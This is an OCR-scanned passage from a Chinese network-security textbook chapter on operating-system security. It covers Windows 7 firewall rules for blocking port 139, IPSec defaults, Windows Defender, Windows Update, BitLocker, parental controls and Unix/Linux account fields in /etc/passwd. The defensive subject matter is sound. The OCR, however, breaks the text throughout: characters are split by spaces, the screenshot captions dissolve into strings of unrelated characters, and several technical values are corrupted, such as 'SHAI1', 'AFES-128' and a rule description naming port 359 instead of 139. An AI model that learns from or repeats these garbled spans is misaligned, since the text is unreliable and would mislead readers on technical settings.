文件 (月 ” 提 作 (A) 查看 。 帮助 (H) 
名 中 | 古国 日 团 | 
站 i 上 人 Win Eo 
MMR 处 二 ex 件 “a.， 拔 作 区 尚且 
ees @ 360se.exe 人 县 ZF | a 
ee @360se.ere 全 用。 显 。 允许 | 也 按 本 村 文件 入 和 
图 的 y 寺 加 360 安 全 了 十 详 时 侠 护 专用 。 是 。 f 许 “| 冯 近 从 坊 六 迁 
晤 连接 安全 规则 加 360 安 全 二 六 时 保护 厅 旺 入骨 aas 
昌 安全 关联 加 360 安 全 P 十 六 时 保护 专用 星人 t 许 
加 360 安 全 了 十 时 全 护 人 星 许 四 
加 360= 人 + 人 用 县 儿 | 台电 
@360s2+O 专用 是 允许 国 号 出 列表 - 由 
四 Ali 公用 是 允许 者 助 
四 Aiiv 公用 是 允许 
@ Apache HTTP Server 公用 是 允许 
@Apache HTTP Server 公开 是 允许 = | 
7 ] PT | » 


图 4-16 入 站 规则 
单 击 右 侧 的 “新 建 规 则 ”选项 可 以 创建 新 的 规则 ， 如 图 4-17 所 示 。 规 则 类 型 包括 : 


@ 程序。 控制 程序 连接 的 规则 ， 可 以 针对 某 一 程序 ， 也 可 以 应 用 到 所 有 程序 。 
e@ 端口。 控制 TCP 或 UDP 端口 连接 的 规则 。 

e@ ”预定 义 。 控 制 Windows 体验 功能 连接 的 规则 。 

@ 自 定义 。 自 定义 规则 。 
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要 8 的 规则 类 型 


口 程序 @) 
控制 程序 连接 的 规则 。 


避 端 口 o) 
控制 TCP 或 UDP 端口 连接 的 规则 。 


) 预定 义 中): 


控制 Yindevs 体验 功能 E 
) 自 定义 CC) 
自 定义 规则 * 


BranchCache ~ 对 等 机 发 现 (使用 YSD) 
功能 连接 的 规则 


图 4-17 “新 建 入 站 规则 向 导 ” 对 话 框 


如 果 要 阻止 139 端口 的 入 侵 ， 则 选中 “端口 (0)” 单 选 按钮 ， 然 后 单 击 “ 下 一 步 ” 按 
钮 出 现 如 图 4-18 所 示 的 界面 。 指 定 规则 应 用 的 协议 和 端口 ， 按 图 4-18 进行 设置 ， 然 后 单 
击 “ 下 一 步 ” 按 钮 出 现 如 图 4-19 所 示 的 界面 。 匹 配 规则 时 执行 的 操作 有 三 种 : 允许 连 
接 、 只 允许 安全 连接 和 阻止 连接 。 这 里 选择 “阻止 连接 (K)”， 单 击 “ 下 一 步 ”按钮 ， 出 现 
如 图 4-20 所 示 的 界面 。 


此 损 刚 话 用 干 所 有 本 坑 沿 口 计量 特 宗 本 协 端 口 ? 


了 所 有 本 地 演 口 4) 
9 eee 139 
示例 : 80、443、5000-5010 


[Lr-S®) | 上 一 步 @) [CE >) ;nD > ] | | | 


图 4-18 “协议 和 端口 ”界面 
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连接 符合 指定 条 件 时 应 该 进行 什么 操作 ? 


允许 和 连接) 
这 也 括 使 用 下 see 保护 以 及 未 使 用 Psee 保护 的 连接 。 


区 上 = 步 o)] [下 =- 步 m >] | 


图 4-19 “操作 ”界面 


何 时 应 用 该 规 刚 ? 


| 司 域 0) 
有 > 所作 计算 机 连接 到 其 企 -Hd 应 用 。 
本 文件 团 才 网) 
种 计算 机 连接 到 志 用 网络 位 置 时 应 用 。 
园 公 用 CD 


计算 机 连接 到 公用 网 络 位 置 时 应 用 。 


= 


图 4-20 “配置 文件 ”界面 


防火 墙 的 配置 文件 采用 分 组 设置 的 方法 ， 对 于 防火 墙 规则 和 安全 连接 规则 ， 系 统 根据 
计算 机 连接 到 的 位 置 进行 分 组 ， 它 包括 三 个 配置 文件 : 域 、 专 用 和 公用 。 每 个 网 络 适 配器 
分 别 匹 配 所 检测 网 络 类 型 的 防火 墙 配置 文件 。 在 此 ， 根 据 实 际 情况 进行 选择 ， 也 可 都 选 。 
设置 完成 后 单 击 “ 下 一 步 ” 按 钮 ， 进 入 “和 名称” 界面 ， 如 图 4-21 所 示 ， 指 定 规则 的 名 称 
和 描述 信息 。 


和 网 络 安 全 与 管理 


名 称 四 
ICP 139 


描述 同 选 ) 0) 
阻止 359 端口 连接 


R 


< 上 = 步 o) | [RW | [取消 


图 4-21 “名 称 ”界面 


设置 完成 后 单 击 “完成 ”按钮 ， 此 时 在 入 站 规则 详细 列表 中 会 出 现 这 条 规则 ， 双 击 这 
条 规则 可 以 对 其 进行 修改 ， 如 图 4-22 所 示 。 


又 (强人 FIA) 重 看 (V) 大 二 (HM 
名 中 | 入 加 | 日 加 
他 eHR 上 9 本 Rs 人 win|EEEET] 
入 站 规则 | 多 
QTrcp 139 
Tcp139 尾 住 “jj 


||| 这 规程 序 和 服务 | 计算 机 | 协议 和 注 口 ] 作用 域 高 级。 用 户 | 


图 4-22 修改 入 站 规则 
如 果 对 系统 安全 性 要 求 较 高 ， 可 以 在 “连接 安全 规则 ”中 通过 “新 建安 全 规则 ”， 创 


建 mtemet 协议 安全 性 (IPSec) 规 则 ， 这 些 规则 对 通信 双方 都 可 以 约束 。Windows 7 中 IPSec 
设置 的 默认 值 如 表 4-3 所 示 。 


第 4 章 操作 系统 安全 123 


表 4-3 IPSec 默认 值 


安全 要 求 设置 项 设置 值 
密 钥 生存 期 480 分 钟 /0 会 话 
密 钥 交换 算法 Diffie-Hellman 组 2 
| 安全 方法 (完整 性 ) SHAI1 
安全 方法 (加 密 ) AFES-128( 主 )/3-DES( 次 ) 
ESP( 主 )AH( 次 ) 
数据 完整 性 SHAI1 
60 分 钟 /100 000KB 
ESP 
SHAI1 
AES-128( 主 )/3-DES( 次 ) 
60 分 钟 /100 000KB 
身份 验证 方法 Kerberos 版 本 5 


连接 安全 规则 的 配置 方式 与 入 站 规则 有 些 类 似 ， 只 是 增加 了 一 些 安全 选项 ， 而 且 是 建 
立 在 通信 双方 相互 验证 的 基础 上 ， 针 对 连接 进行 管理 。 

(1) 连接 安全 规则 的 类 型 。 连 接 安 全 规则 的 类 型 有 以 下 几 种 。 

@ 隔离 ;根据 规则 定义 的 身份 验证 标准 对 连接 进行 限制 ， 可 以 对 域内 和 域外 的 计算 
机 进行 隔离 。 

该 类 型 的 设置 向 导 包 括 “ 要 求 ”、“ 身 份 验证 方法 ”、“ 配 置 文件 ”和 “名 称 ” 等 
页 面 。 

@ 免除 身份 验证 ， 可 以 使 指定 计算 机 免 于 身份 验证 ， 而 不 考虑 其 他 连接 安全 规则 。 
此 类 规则 通常 用 于 授权 访问 基础 结构 计算 机 ， 如 Active Directory 域 控制 器 、DHCP 服务 
器 。 免 于 身份 验证 不 等 于 允许 连接 ， 因 此 ， 防 火 墙 必须 允许 双方 进行 连接 。 

该 类 型 的 设置 向 导 包 括 “ 免 除 计算 机 ”、“ 身 份 验 证 方法 ”、“ 配 置 文件 ”和 “名 
称 ” 等 页 面 。 

@ ”服务 器 到 服务 器 指定 计算 机 (组 ) 之 间 、 子 网 之 间 、 计 算 机 和 计算 机 组 或 子 网 之 
间 的 通信 进行 身份 验证 。 可 以 使 用 此 规则 对 数据 库 服务 器 和 业务 层 计 算 机 之 间或 基础 结构 
计算 机 和 其 他 服务 器 之 间 的 流量 进行 身份 验证 。 

该 类 型 的 设置 向 导 包 括 “ 终 结 点 ”、“ 要 求 ”、“ 身 份 验证 方法 ”、“ 配 置 文件 ”和 
“名 称 ” 等 页 面 。 

”隧道 ,可 以 通过 IPSec 中 的 隧道 模式 而 非 传 输 模式 确保 两 台 计 算 机 之 间 安 全 地 进 
行 通信 。 隧 道 模式 将 整个 网 络 数据 包 骨 入 到 两 个 已 定义 终结 点 之 间 路 由 的 数据 包 中 。 对 于 
每 个 终结 点 ， 可 以 指定 单个 计算 机 ， 也 可 以 指定 连接 到 专用 网 络 的 网 关 计算 机 ， 接 收 隧道 
终结 点 从 隧道 中 提取 接收 的 流量 ， 然 后 将 流量 路 由 到 该 专用 网 络 。 

该 类 型 的 设置 向 导 包 括 “ 隧 道 类 型 ”、“ 要 求 ”、“ 隧 道 终结 点 ”、“ 身 份 验证 方 
法 ”、“ 配 置 文件 ”和 “名 称 ”等 页 面 。 
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@” 自 定义 : 使 用 该 规则 类 型 可 以 创建 需要 特殊 设置 的 规则 。 

该 类 型 的 设置 向 导 包 括 “ 终 结 点 ”、“ 要 求 ”、“ 身 份 验证 方法 ”、“ 协 议和 端 
口 ”、“ 配 置 文 件 ” 和 “名 称 ” 等 页 面 。 

(2) 终结 点 。 指 定 用 户 连 接 安全 规则 的 计算 机 和 计算 机 组 ， 连 接 安 全 规则 应 用 于 “ 终 
结 点 1” 中 任何 计算 机 和 “终结 点 2” 中 任何 计算 机 之 间 的 通信 。 

(3) 隧道 。IPSec 隧道 模式 用 来 与 不 支持 第 二 层 隧道 协议 (L2TP) 或 点 到 点 隧道 协议 
(PPTP) 的 VPN 隧道 的 路 由 器 、 网 关 或 终端 系统 进行 相互 通信 。 只 有 在 网 关 到 网 关 隧 道 方 
案 和 某 些 服务 器 到 服务 器 或 服务 器 到 网 关 的 配置 中 才 支 持 IPSec 隧道 模式 。 隧 道 有 三 种 类 
型 ， 自 定义 配置 、 客 户 端 到 网 关 、 网 关 到 客户 端 。 

Windows 7 的 防火 墙 为 操作 系统 安全 提供 了 强大 的 保障 ， 但 也 并 非 面面俱到 ， 它 对 两 
种 威胁 无 能 为 力 : 电子 邮件 病毒 和 网 络 钓鱼 。 电 子 邮 件 病毒 随 附 于 电子 邮件 ， 防 火 墙 无 法 
确定 电子 邮件 的 内 容 ， 因 此 它 无 法 保护 用 户 免 受 这 类 病毒 的 侵害 ， 网 络 钓鱼 是 一 种 技术 ， 
用 于 欺骗 计算 机 用 户 泄漏 个 人 信息 或 财务 信息 (例如 银行 账户 密码 )， 防 火 墙 无 法 检查 用 户 
收 到 信息 的 内 容 ， 因 此 它 无 法 保护 用 户 免 受 这 类 攻击 的 侵害 。 阻 止 这 些 威胁 要 求助 于 
Windows Defender 实时 保护 。 


4.2.5 Windows Defender 实时 保护 


Windows Defender 是 Windows 附带 的 一 种 反 间 谍 软 件 ， 当 Windows 打开 时 会 自动 
运行 ， 帮 助 保护 计算 机 免 受 间谍 软件 和 其 他 可 能 不 需要 的 软件 的 侵扰 。 当 连接 Intemet 
时 ， 间 谍 软 件 可 能 会 在 用 户 不 知道 的 情况 下 安装 到 计算 机 上 ， 并 且 在 使 用 CD、DVD 或 
其 他 可 移动 媒体 安装 某 些 程序 的 时 候 ， 间 谍 软 件 可 能 会 感染 用 户 的 计算 机 。 间 谍 软 件 并 非 
仅 在 安装 后 才能 运行 ， 它 还 可 能 被 编程 为 在 意外 时 间 运 行 。 

在 “操作 中 心 ” 打 开 Windows Defender， 或 者 在 “控制 面板 ”的 “大 (小 ) 图 标 ” 查 看 


更 新 的 信息 以 及 有 关 亚 章 软 件 的 最 


4-23 Windows Defender 


第 4 章 操作 系统 安全 125 


Windows Defender 提供 以 下 两 种 方法 防止 间谍 软件 感染 计算 机 : 
@ ”实时 保护 。 Windows Defender 会 在 间谍 软件 尝试 将 自己 安装 到 计算 机 上 并 在 计 
算 机 上 运行 时 向 用 户 发 出 警告 。 如 果 程 序 试图 更 改 重要 的 Windows 设置 ， 它 也 
会 发 出 警报 。 
e@ ”扫描 选项 。 可 以 使 用 Windows Defender 扫描 可 能 已 安装 到 计算 机 上 的 间谍 软 
件 ， 定 期 计划 扫描 ， 还 可 以 自动 删除 扫描 过 程 中 检测 到 的 任何 恶意 软件 。 
使 用 Windows Defender 时 ， 更 新 “定义 ”非常 重要 。 定 义 是 一 些 文件 ， 它 们 就 像 一 
本 不 断 更 新 的 有 关 洪 在 软件 威胁 的 百科 全 书 。Windows Defender 确定 检测 到 的 软件 是 间 
谍 软 件 或 其 他 可 能 不 需要 的 软件 时 ， 使 用 这 些 定义 来 警告 用 户 潜在 的 风险 。 为 保持 定义 为 
最 新 ，Windows Defender 与 Windows Update 一 起 运行 ， 以 便 在 发 布 新 定义 时 自动 进行 
安装 。 还 可 将 Windows Defender 设置 为 在 扫描 之 前 联机 检查 ， 更 新 定义 。 
Windows Defender 给 用 户 发 出 的 警报 分 成 三 个 等 级 ， 如 表 4-4 所 示 。 


表 4-4 警报 等 级 


警报 级 别 含 义 
可 能 搜集 个 人 信息 ， 并 对 隐私 产 
生 负 面 影响 或 损害 计算 机 的 程序 


建议 操作 


严重 或 高 立即 删除 此 软件 


复查 警报 详细 信息 ， 查 看 为 何 会 检测 到 此 软件 。 如 
果 不 喜 欢 软件 的 运行 方式 ， 或 不 了 解 和 信任 发 布 
者 ， 则 考虑 阻止 或 删除 该 软件 

除非 此 软件 在 您 未 指示 的 情况 下 安装 ， 否 则 它 通常 
会 作为 有 益 软件 在 计算 机 上 运行 。 如 果 不 确定 是 否 
机 的 运行 方式 ， 但 它 按照 协议 操 | 允许 其 运行 ， 则 复查 警报 详细 信息 或 查看 是 否 了 解 
作 ， 安 装 时 会 显示 许可 条 款 和 信任 该 软件 的 发 布 者 


警报 等 级 可 以 帮助 用 户 决定 针对 威胁 采取 的 措施 ，Windows 实时 保护 提供 三 种 操作 : 

@ 隔离。 将 软件 移动 到 计算 机 上 的 另 一 个 位 置 ， 在 用 户 做 出 选择 前 阻止 其 运行 。 

@ ”删除 。 将 软件 从 计算 机 中 永久 删除 。 

@ ”人 允许 。 将 软件 添加 到 Windows Defender 人 允许 列表 并 允许 它 在 计算 机 上 运行 。 
Windows Defender 将 停止 警报 此 软件 可 能 给 您 的 隐私 或 计算 机 带 来 的 风险 。 该 操 
作 只 对 中 、 低 级 别 的 警报 显现 。 

单 击 “ 工 具 和 设置 ”中 的 “选项 ”， 打 开 如 图 4-24 所 示 的 窗口 。 在 此 可 以 对 实时 保 

护 进行 基本 的 设置 。 

在 “自动 扫描 ”选项 卡 中 可 以 设置 计算 机 自动 扫描 的 频率 、 大 约 时 间 和 类 型 。 另 外 ， 
为 了 避免 自动 扫描 打扰 用 户 的 工作 ， 可 以 选中 “ 仅 当 系 统 空闲 时 运行 扫描 (R)” 复 选 框 ， 
以 方便 用 户 ， 提 高 效率 。 

在 “排除 的 文件 和 文件 夹 ” 和 “排除 的 文件 类 型 ”选项 卡 中 ， 用 户 还 可 以 根据 实际 情 
况 ， 把 一 些 人 为 安全 的 文件 、 文 件 夹 以 及 文件 类 型 排除 在 Windows Defender 之 外 ， 以 节 
省 扫描 的 时 间 。 


可 能 影响 您 的 隐私 或 更 改 计 算 机 
对 计算 体验 产生 负面 影响 的 程序 


可 能 不 需要 的 软件 会 搜集 有 关 用 
户 或 计算 机 的 信息 ， 或 更 改 计算 


126 


| ass) 


图 4-24 “选项 ”窗口 


在 “高 级 ”选项 卡 ( 见 图 4-25) 中 ， 可 以 选中 “扫描 电子 邮件 (E)” 复 选 框 ， 保 存 成 功 
后 ，Windows Defender 会 对 计算 机 接收 的 电子 邮件 的 内 容 和 附件 进行 扫描 ， 以 确保 不 存在 
恶意 软件 或 不 需要 的 软件 。 


UT 
| 全 pe 凤 5 


国 扫 接 存 档 文 件 (A) 


实时 保护 在 存档 文件 (如 ,ZIP 或 ,CAB) 中 扫 后 秋 章 软件 或 不 雪 要 的 软件 . | 
排 8 的 文件 和 文件 交 

和 的 文件 型 EF 

在 王子 部 人 的 内 容 或 拓 件 二 扫 将 刘 次 件 或 不 要 要 的 软 牛 - 

目 扫 经 可 入 到 驱动 号 (MI BR 


在 可 移动 自动 器 (名 US8 闪存 驱动 器 ) 的 内 容 直 扫 接 悉 起 软件 或 不 委 要 的 软件 
国 使 用 启发 (H) 

通过 得 看 与 革 个 现 有 定义 避 分 匹配 的 项 目 ， 窒 油 地 生 钦 舍 或 不 寺 要 的 软件 - 
国 创建 还 原点 (R) 

7 恰 测 到 的 项 目 应 月 提 作 之 前 , 创建 一 个 还 原点 


EDE | 


图 4-25 “高 级 ”选项 卡 


4.2.6 Windows 7 的 其 他 安全 功能 
1. Windows Update 


及 时 为 操作 系统 打 补 丁 、 修 补漏 洞 是 保护 系统 安全 的 基础 。 使 用 Windows 自动 更 新 
不 必 联 机 搜索 ， 并 且 ，Windows Update 包含 检测 计算 机 相关 信息 (如 Windows 和 计算 机 正 
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在 运行 的 其 他 Microsoft 软件 的 制造 商 、 型 号 以 及 版 本 ) 的 工具 。Microsoft 使 用 这 些 信息 
只 安装 计算 机 所 需 的 更 新 。 

打开 “控制 面板 ”中 的 Windows Update， 然 后 单 击 “ 更 改 设置 ”选项 ， 在 打开 的 窗 
口中 选择 自动 更 新 的 方式 ， 如 图 4-26 所 示 。 


文件 (月 编 强 (E) ”可 看 V) 工具 (Tm 帮助 (H) 


选择 Windows 安装 更 新 的 方法 

计算 机 联机 8j ，Windows 可 以 使 用 这 些 设置 生动 检查 重要 的 更 新 并 对 它们 进行 安装 。 当 有 新 的 更 新 时 ,您 也 
可 以 在 关闭 计算 机 之 前 对 它们 进行 安装 。 
自动 更 新 如 何 帮 助 我? 


重要 更 新 和 


筷 生动 安 半 更 新 ( 维 荐 ) pe 


推荐 更 新 
园 se 
谁 可 以 安装 更 新 

贺 允许 所 有 用 户 在 此 计算 机 上 安装 更 新 (U) 


注意 : Windows Update 在 检查 其 他 更 新 之 前 ， 可 能 会 戎 先 号 动 进行 乌 我 更 新 。 请 网 读 耻 机 售 私 声明 . 


图 4-26 “更 改 设置 ”窗口 


Windows Update 对 于 重要 更 新 提供 4 种 选项 : 


自动 安装 更 新 (推荐 )。 系 统 自 己 下 载 并 自己 安装 更 新 ， 不 需要 用 户 的 参与 。 

下 载 更 新 ， 但 是 由 我 来 决定 什么 时 候 安装 更 新 。 系 统 自己 下 载 更 新 ， 下 载 完成 后 
询问 用 户 是 否 安装 ， 用 户 也 可 以 选择 在 之 后 需要 的 时 候 安装 。 

检查 更 新 ， 但 是 让 我 选择 是 否 下 载 和 安装 更 新 。 有 更 新 时 通知 用 户 ， 但 不 自动 下 
载 ， 等 待 用 户 选择 下 一 步 操作 。 

从 不 检查 更 新 (不 推荐 )。 除 非 有 第 三 方 软件 帮助 用 户 进行 系统 更 新 和 打 补 丁 ， 否 
则 不 要 选择 该 项 。 


在 Windows Update 中 还 能 查看 已 经 安装 的 更 新 或 已 经 下 载 但 还 未 安装 的 更 新 。 
2. BitLocker 驱动 器 加 密 


使 用 BitLocker 可 以 保护 Windows 驱动 器 上 存储 的 所 有 文件 ， 包 括 操作 系统 驱动 器 ， 
与 加 密 单个 文件 的 加 密 文件 系统 (EFS) 不 同 ，BitLocker 可 加 密 整个 驱动 器 。 用 户 可 以 正常 
登录 和 使 用 文件 ，BitLocker 会 阻止 黑客 访问 系统 文件 和 驱动 器 ， 即 使 把 驱动 器 挂 载 到 别 


的 计算 机 上 。 


在 将 新 的 文件 添加 到 已 使 用 BitLocker 加 密 的 驱动 器 时 ，BitLocker 会 自动 对 这 些 文件 
进行 加 密 。 文 件 只 有 存储 在 加 密 驱 动 器 中 时 才 保 持 加 密 状 态 。 复 制 到 其 他 驱动 器 或 计算 机 
的 文件 将 被 解密 。 如 果 与 其 他 用 户 共享 文件 ， 则 当 这 些 文件 存储 在 已 加 密 驱 动 器 上 时 仍 将 


128 网 络 安全 与 管理 


保持 加 密 状 态 ， 但 是 授权 用 户 通常 可 以 访问 这 些 文件 。 
选择 “控制 面板 ”一 “系统 和 安全 ”一 “BitLocker 驱动 器 加 密 ”， 打 开 如 图 4-27 所 
示 的 窗口 。 


(CO OTE 
IE EYE 


St 通过 对 驱动 器 进行 加 密 来 帮助 保护 您 的 文件 和 文件 夹 | 
BitLocker 驱动 圳 加 室 有 助 于 阻止 对 存储 在 下 面 旦 示 的 驱动 器 中 的 所 有 文件 进行 未 经 授权 的 访问 。 您 可 以 正常 | 
使 用 计算 机 ， 但 未 授权 用 户 无 法 汛 取 或 使 用 您 的 文件 . 
局 用 BitLocker 驱动 强加 密 之 前 必须 了 解 的 信息 ? 


BitLocker 驱动 器 加 害 - 硬盘 纺 动 器 


二 启用 BitLocker 


_。 ”新 h0 卷 (D;) 哮 启用 BitLocker 
Sp 光 
”新 加 灼 (E) 嘱 有 用 BitLocker 
SS 


_ 2-1( 曙 起 用 BitLocker 
Sy 滞 


加 


_ 2-2(G) 二 启用 BkLocker 
Sy 惹 


2-3(H) 重 语 且 BitLocker 
号 请 大同 = 


联机 网 这 隐私 声明 BitLocker 驱动 号 加 密 - BhLocker To Go 
播 入 可 移动 驱动 器 以 使 用 BitLocker To Go。 


图 4-27 “BitLocker 驱动 器 加 密 ” 窗 口 


如 果 对 操作 系统 驱动 器 进行 加 密 ，BitLocker 将 在 启动 过 程 中 检查 计算 机 是 否 存在 任 
何 可 能 具有 安全 风险 的 情况 (如 对 BIOS 或 任何 启动 文件 的 更 改 )。 如 果 检 测 到 潜在 的 安全 
风险 ，BitLocker 将 锁定 操作 系统 驱动 器 ， 并 且 需 要 特殊 的 BitLocker 恢复 密 钥 才能 对 其 解 
锁 。 因 此 ， 必 须 确保 在 第 一 次 打开 BitLocker 时 创建 恢复 密 钥 ， 否则， 可 能 永久 失去 对 文 
件 的 访问 权限 。 如 果 计 算 机 具有 受信 任 的 平台 模块 (TPM) 芯 片 ，BitLocker 会 使 用 它 来 密封 
对 加 密 的 操作 系统 驱动 器 解锁 的 密 钥 。 启 动 计算 机 时 ，BitLocker 会 要 求 TPM 提供 该 驱 
动 器 的 密 钥 并 对 其 解锁 。 

如 果 对 数据 驱动 器 (固定 或 可 移动 ) 加 密 ， 则 可 以 使 用 密码 或 智能 卡 解锁 加 密 的 驱动 
器 ， 或 者 设置 驱动 器 在 登录 计算 机 时 自动 解锁 。 可 以 随时 通过 挂 起 BitLocker 将 其 临时 关 
闭 ， 或 者 通过 解密 驱动 器 将 其 永久 关闭 。 

使 用 BitLocker To Go， 可 以 加 密 可 移动 数据 驱动 器 (如 外 部 硬盘 驱动 器 或 USB 闪存 
驱动 器 ) 及 其 存储 的 所 有 文件 。 
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3. 家 长 控制 


管理 员 可 以 使 用 家 长 控制 对 儿童 使 用 计算 机 的 方式 进行 管理 。 例 如 ， 管 理 员 可 以 限制 
儿童 使 用 计算 机 的 时 段 、 可 以 玩 的 游戏 类 型 以 及 可 以 运行 的 程序 。 

当家 长 控制 阻止 了 对 某 个 游戏 或 程序 的 访问 时 ， 会 显示 一 个 通知 ， 声 明 已 阻止 该 程 
序 。 孩 子 可 以 单 击 通知 中 的 链接 ， 以 请 求 获 得 该 游戏 或 程序 的 访问 权限 。 管 理 员 可 以 通过 
输入 账户 信息 的 方式 允许 其 访问 。 

若 要 为 孩子 设置 家 长 控制 ， 用 户 必 须 有 一 个 管理 员 账户 。 在 开始 设置 之 前 ， 还 要 确保 
设置 家 长 控制 的 每 个 孩子 都 有 一 个 标准 的 用 户 账户 。 家 长 控制 只 能 应 用 于 标准 用 户 账户 。 

设置 家 长 控制 的 步骤 如 下 。 

在 “控制 面板 ”中 打开 “家 长 控制 ”窗口 ， 如 图 4-28 所 示 。 


| 
| 了 | 二 ， 近 和 西 二 、 所 有 过 面板 项 家 长 控制 -~ 


[IE mae Ew IRM wm 
选择 一 个 用 户 并 设置 家 长 控制 
二 长 近 出 可 以 用 来 仙人 
用 户 


a zs 
计算 机 管理 员 
受 密码 保护 


eam 
mE 

受 密码 保护 
(|) UpdatusUser 

标准 用 户 

受 密码 保护 


如 果 要 柠 家 长 控制 应 用 于 不 在 此 列表 中 的 村 个 用 户 ， 请 为 该 用 户 创建 一 个 新 
用 户 帐户 。 


为 何 需要 此 帐户 ? 
双 浊 建新 用 户外 户 


其 他 控件 


图 4-28 “家 长 控制 ”窗口 


单 击 要 进行 家 长 控制 的 标准 账户 ， 如 lili， 打 开 “ 用 户 控制 ”窗口 ， 如 图 4-29 所 示 。 
选中 “启用 ， 应 用 当前 设置 ” 单 选 按 钮 ， 然 后 可 以 设置 时 间 限 制 、 游 戏 、 人 允许 和 阻止 特定 
程序 。 

(1) 时 间 限 制 。 可 以 对 儿童 登录 计算 机 的 时 间 进 行 控制 。 阻 止 在 指定 时 段 使 用 计算 
机 ， 如 果 在 分 配 的 时 间 结束 后 仍 处 于 登录 状态 ， 则 自动 注销 。 时 间 限 制 可 以 精确 到 小 时 。 

(2) 游戏 。 可 以 控制 儿童 对 游戏 的 访问 ， 可 以 选择 特定 的 或 基于 年 龄 分 级 的 游戏 ， 同 
时 也 可 以 阻止 基于 内 容 分 级 的 游戏 。 

(3) 允许 和 阻止 特定 程序 。 可 以 控制 儿童 对 默认 特定 程序 的 使 用 ， 如 财务 管理 程序 、 
未 能 阻止 的 游戏 等 。 
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【玉芝 轩 者 “所 有 控制 面板 项 ， 家 长 控制 用 户 控制 = 
文件 (月 ”编辑 (E) ”查看 (V) 工具 (T) 帮助 (H) 


设置 i 使 用 计算 机 的 方式 
家 长 控制 : 

回 启用 , 应 用 当前 设置 
Windows 设置 


| 证 es 
控制 i 使 用 计算 机 的 时 间 


游戏 
4 按 分 级 、 内 容 或 标题 控制 游戏 


二 允许 和 阻止 特 十 程序 
[多 许 和 阻止 您 的 计算 机 上 的 任 _ 程 序 


图 4-29 “用 户 控制 ”窗口 


4.3 Unix/Linux 操作 系统 的 安全 


Unix 是 一 个 功能 强大 、 人 性 能 全 面 的 多 用 户 、 多 任务 操作 系统 ， 可 以 应 用 于 从 巨型 计 
算 机 到 普通 的 个 人 计算 机 等 多 种 不 同 的 平台 上 ， 是 应 用 面 最 广 、 影 响 力 最 大 的 操作 系统 ; 
Linux 是 一 个 外 观 和 性 能 与 Unix 基本 相同 的 操作 系统 ， 能 够 在 普通 的 个 人 计算 机 上 实现 
Unix 的 全 部 特性 和 功能 ， 具 有 多 任务 、 多 用 户 的 能 力 。 

在 网 络 管理 能 力 和 安全 方面 ，Unix 系统 一 直 被 用 做 高 端 应 用 或 服务 器 系统 ， 拥 有 一 

完善 的 网 络 管理 机 制 和 规则 ，Linux 沿用 了 这 些 出 色 的 规则 ， 使 系统 具备 很 强 的 可 配置 
能 力 。 因 此 ， 本 节 把 Unix 系统 和 Linux 系统 的 安全 性 放 在 一 起 讲述 ， 配 置 将 以 Linux 
为 例 。 


4.3.1 Unix/Linux 操作 系统 的 安全 性 


与 Windows 相 比 ，Unix/Linux 系统 强大 的 安全 性 在 于 拥有 良好 的 安全 架构 设计 。 微 
软 的 安全 性 设计 是 建立 在 操作 系统 基础 上 ，Unix 系统 安全 性 则 是 从 系统 架构 出 发 考虑 ， 
从 底层 设计 开始 就 将 安全 考虑 进去 了 。 

1. 身份 验证 


1) “用户 账号 

用 户 账号 是 用 户 在 Unix/Linux 操作 系统 上 的 合法 身份 标识 ， 最 简单 的 形式 是 用 户 名 
(login name)/ 口 令 (password)。 有 关 账 户 的 相关 信息 存放 在 系统 的 /etc/passwd 文件 中 ， 每 个 
用 户 信息 占 一 行 ， 包括 几 个 系统 正常 工作 所 必需 的 标准 系统 标识 ， 每 行 由 几 个 域 组 成 ， 域 
之 间 用 冒号 (:) 隔 开 。passwd 文件 格式 如 下 所 示 : 
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root:x:0:0:root:/root:/bin/bash 

bin:x:1:1:bin:/bin:/sbin/nologin 

daemon:x:2:2:daemon:/sbin:/sbin/nologin 

adm:x:3:4:adm:/var/adm:/sbin/nologin 

lp:x:4:7:1lp:/var/spool/lpd:/sbin/nologin 

sync:x:5:0:sync:/sbin:/bin/sync 

shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown 

halt:x:7:0:halt:/sbin:/sbin/halt 

ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin 

5123:x:501:501::/home/s123:/bin/bash 

各 个 域 代表 的 信息 如 下 : 

(1) 注册 名 (login_ name): 用 于 区 分 不 同 的 用 户 。 在 同一 系统 中 注册 名 是 唯一 的 。 在 
很 多 系统 上 ， 该 字段 被 限制 在 8 个 字符 (字母 或 数字 ) 之 内 ， 并 且 对 字母 大 小 写 敏 感 。 

(2) 口令 passwd): 系统 用 口令 来 验证 用 户 的 合法 性 。 超 级 用 户 root 或 某 些 高 级 用 户 
可 以 使 用 系统 命令 passwd 来 更 改 系统 中 所 有 用 户 的 口令 ， 普 通用 户 也 可 以 在 登录 系统 后 
使 用 passwd 命令 来 更 改 自己 的 口令 。 

(3) 用 户 标 识 号 (UID): UID 是 一 个 数值 ， 是 Linux 系统 中 唯一 的 用 户 标识 ， 用 于 区 
别 不 同 的 用 户 。 在 系统 内 部 管理 进程 和 文件 保护 时 使 用 UID 字段 。 注 册 名 和 UID 都 可 以 
用 于 标识 用 户 ， 只 不 过 对 于 系统 来 说 UID 更 为 重要 ; 而 对 于 用 户 来 说 注册 名 使 用 起 来 更 
方便 。 

(4) 组 标识 号 (GID): 指 当前 用 户 的 缺 省 工作 组 标识 。 具 有 相似 属性 的 多 个 用 户 可 以 
被 分 配 到 同一 个 组 内 ， 每 个 组 都 有 自己 的 组 名 ， 用 组 标识 号 相 区 分 。 组 标识 号 也 存放 在 
passwd 文件 中 。 在 现代 的 Unix/Linux 系统 中 ， 每 个 用 户 可 以 同时 属于 多 个 组 。 系 统 
/etc/group 文件 中 列 出 了 每 个 组 所 包含 用 户 。 

(5) 用 户 名 (user_ name): 包含 有 关 用 户 的 信息 ， 例 如 真实 姓名 、 地 址 和 联系 电话 等 。 
Mail 和 finger 等 程序 利用 这 个 域 来 获取 用 户 信息 。 

(6) 用 户主 目录 (home _directory): 该 字段 定义 了 个 人 用 户 的 主 目录 ， 用 户 成 功 登录 
后 ， 其 shell 把 该 目录 作为 用 户 的 工作 目录 ， 个 人 用 户 的 文件 都 放置 在 各 自 的 主 目录 下 。 
通常 ， 超 级 用 户 root 的 工作 目录 为 /root; 其 他 个 人 用 户 的 目录 都 在 /home 下 。 

(7) 命令 解释 程序 (shel): shell 是 当 用 户 登录 系统 时 运行 的 程序 名 称 ， 通 常 是 一 个 
shell 程序 的 全 路 径 名 ， 如 /bin/bash。 为 了 阻止 一 个 特定 用 户 登录 系统 ， 可 用 /dev/null 作为 
